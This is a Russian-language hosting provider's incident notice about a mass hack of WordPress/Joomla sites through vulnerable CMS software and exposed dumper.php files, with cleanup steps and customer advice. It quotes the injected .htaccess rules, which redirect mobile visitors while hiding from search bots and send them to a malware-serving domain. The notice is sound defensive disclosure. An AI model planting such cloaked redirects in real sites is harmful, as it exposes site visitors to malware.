Массовый взлом сайтов на Wordpress/Joomla

Уважаемые клиенты

В течение нескольких последних дней была произведено несколько атак, в результате которых массовому взлому подвергся ряд сайтов. Нами было расследовано порядка полутора десятка инцидентов, в разультате чего были выявлены закономерности: взлому подверглись аккаунты, на которых есть сайты, сделанные на базе Wordpress, Joomla или содержащие в открытом доступе скрипт dumper.php, часто используемый для переноса данных между различными хостингами. Не исключено, что так же взламывались сайты и на других популярных CMS.

Что именно произошло?

Исходя из собранных нами следов взлома было выяснено, что взлом производился автоматически специально написанными для этого скриптами, которые запускались с серверов злоумышленников. Эти скрипты находили сайты с уязвимостями в известном им ПО и через найденные уязвимости получали контроль над аккаунтом жертвы. Было так же выяснено, что после получения контроля у взломанных аккаунтов в содержимое файлов .htaccess добавлялся следующий код:

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://m.extrasoftware.biz/?19&source=91.201.52.47 [L,R=302] # On

Код третьей строки варьировался от сайта к сайту, но во всех случаях переадресация шла на http://m.extrasoftware.biz/… Этот код делает следующее: если на сайт заходят браузером с мобильного телефона, то происходит переадресация посетителя на сайт m.extrasoftware.biz, где посетителю пытаются подсунуть вирус. Если же на сайт заходят обычным браузером с компьютера или роботом поисковой системы, то сайт работает как обычно.

Следов каких-то других зловредных действий, кроме изменения файлов .htaccess мы не обнаружили.

Проанализировав известные нам случаи взлома мы произвели глобальный поиск измененных таким образом файлов .htaccess и выяснили, что всего взлому подверглось по меньшей мере несколько сотен сайтов. К нам так же поступили сведения о том, что аналогичному взлому подверглись сайты, размещенные у некоторых других хостеров, в том числе и зарубежных.

Какие меры предприняли мы

Убедившись, что действия злоумышленников свелись к модификации файлов .htaccess, мы написали и запустили по всем нашим серверам скрипт, который проделал обратные действия: нашел все измененные таким образом файлы .htaccess по сигнатуре и удалил приведенные выше строки. Таким образом, последствия массового взлома были нами ликвидированы.

Кроме того, мы во внеплановом порядке завершили ряд технических работ по обновлению ПО наших серверов хостинга: на 5 из 8 серверов эти работы были проведены ранее, на оставшихся трех работы были проведены сегодня ночью.

Тем не менее, не смотря на проделанную нами работу следует понимать, что причина взломов - это уязвимости в ПО сайтов (joomla/wordpress) и нахождение в открытом доступе скрипта dumper.php и эти проблемы мы решить за наших клиентов не можем. Поэтому, проделанная нами работа не является устранением уязвимостей, через которые был произведен взлом, мы устранили только последствия взлома.

Что мы рекомендуем проделать нашим клиентам

• Если у вас на аккаунте размещены сайты, сделанные на Wordpress, Joomla или других популярных CMS с открытыми исходными кодами, даже если эти сайты размещены на служебных доменах типа uXXXXX.netangels.ru и на них как вам кажется никто не ходит, мы настоятельно рекомендуем обновить ПО этих сайтов до самых последних версий и в дальнейшем стараться устанавливать обновления сразу же, как только они выйдут.
• Если у вас на аккаунте присутствует файл dumper.php, рекомендуем его удалить, либо переименовать, либо ограничить к нему доступ (как это делается описано в статье “Несколько простых примеров использования файла .htaccess“

Пожалуйста, обратите внимание, что поскольку мы уже массово удалили вредоносное содержимое из файлов .htaccess, отсутствие соответствующего кода в ваших файлах не означает, что ваш аккаунт не уязвим и если вы используете открытые CMS или dumper.php, проделать рекомендованные действия нужно обязательно в любом случае.

Стоит так же отметить, что это уже не первый случай массового взлома сайтов на Wordpress/Joomla за последний год. Мы сталкивались с аналогичными случаями прошедшей зимой и сняли об этом подкаст, который можно посмотреть на нашей странице на vk.com